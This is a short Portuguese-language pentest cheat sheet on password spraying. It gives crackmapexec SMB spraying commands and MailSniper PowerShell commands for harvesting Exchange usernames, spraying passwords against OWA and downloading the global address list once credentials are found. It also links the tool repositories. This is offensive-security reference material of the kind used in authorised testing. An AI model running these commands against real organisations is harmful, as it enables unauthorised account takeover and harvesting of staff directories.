Password Spray

Ataque parecido com o tradicional Brute Force, porém esse não irá tentar várias senhas para um usuário, mas sim uma única senha para vários usuários. Geralmente essas senhas são as mais óbvias possível, como Senha123, Empresa123, Mudar2023, etc.

Crackmapexec

crackmapexec smb <ip> -u <user.txt> -p Senha123

Password Spray contra Office 365

MailSniper

ipmo MailSniper.ps1

Enumeração NetBIOS do domínio

Invoke-DomainHarvestOWA -ExchHostname <mail.domain.com>

Enumerando usuários do domínio. Utilize o namemash.py antes para deixar os nomes no padrão correto, ou pelo menos tentar encontrar isso

Invoke-UsernameHarvestOWA -ExchHostname <mail.domain.com> -Domain <domain.com> -UserList <wordlist-users.txt> -OutFile <output.txt>

Realizando o ataque de Password Spray contra OWA (Outlook Web Access). O MailSniper também tem usporte a outras tecnologias como EWS (Exchange Web Service), EAS (Exchange ActiveSync) e Gmail.

Invoke-PasswordSprayOWA -ExchHostname <mail.domain.com> -UserList <wordlist-users.txt> -Password <SenhaDefault>

Caso localize alguma credencial válida, é possível baixar a lista de endereços global

Get-GlobalAddressList -ExchHostname <mail.domain.com> -UserName <domain.com>\<user> -Password <pass> -OutFile <output-all-users.txt>

Sites

# MailSniper
https://github.com/dafthack/MailSniper

# SprayingToolkit
https://github.com/byt3bl33d3r/SprayingToolkit
PreviousOfflineNextDoS / DDoS

Last updated